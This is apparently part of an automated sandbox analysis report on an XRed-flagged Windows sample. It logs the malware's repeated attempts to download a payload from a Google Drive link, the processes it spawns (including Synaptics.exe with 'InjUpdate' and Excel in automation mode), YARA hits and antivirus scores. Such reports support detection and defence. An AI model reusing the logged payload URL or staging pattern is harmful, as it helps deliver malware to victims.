                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    141192.168.2.949934142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sXT7iUU1rYPgVpiHffuckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    142192.168.2.949936142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC597P00JE0aqk-tNlVUuai51x2BlP6uVIAij4EHkRvlOLu1SbDrTs2_FHIY_pIogT7wKkABcEQ
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZxcGcWu8GRrh6KCa_Oye2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 36 70 56 34 34 67 35 34 34 6f 51 4b 43 43 4a 63 38 63 50 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="86pV44g544oQKCCJc8cPUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    143192.168.2.949937142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4kiA2qeotdv_UzxtDj3ZIsSmrWZ8kfkfweN4vnP0rR6eh4cSyKLM2rZPXowDqUdcSZx5zn8vk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o-zF1mSrLikNBAMxffJiZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 46 4d 61 5f 65 42 66 62 53 6a 73 50 64 53 63 6c 31 35 70 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="UFMa_eBfbSjsPdScl15pTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    144192.168.2.949940142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    145192.168.2.949941142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:09 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DJoVcXQt2GNb9uaXojHrqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    146192.168.2.949942142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    147192.168.2.949943142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    148192.168.2.949944142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pYJ7G9JKujtTqpvqzj8Cgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    149192.168.2.949945142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G-zCX6O1ingw_2vwQBH1VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:05:25:09
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\LWQDFZ.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'686'528 bytes
                                                                                                                    MD5 hash:27BCC0D927E9F13250B1DFF9E122E9AF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:05:25:10
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_LWQDFZ.exe"
                                                                                                                    Imagebase:0x3a0000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 53%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:25:10
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:771'584 bytes
                                                                                                                    MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x6a0000
                                                                                                                    File size:53'161'064 bytes
                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
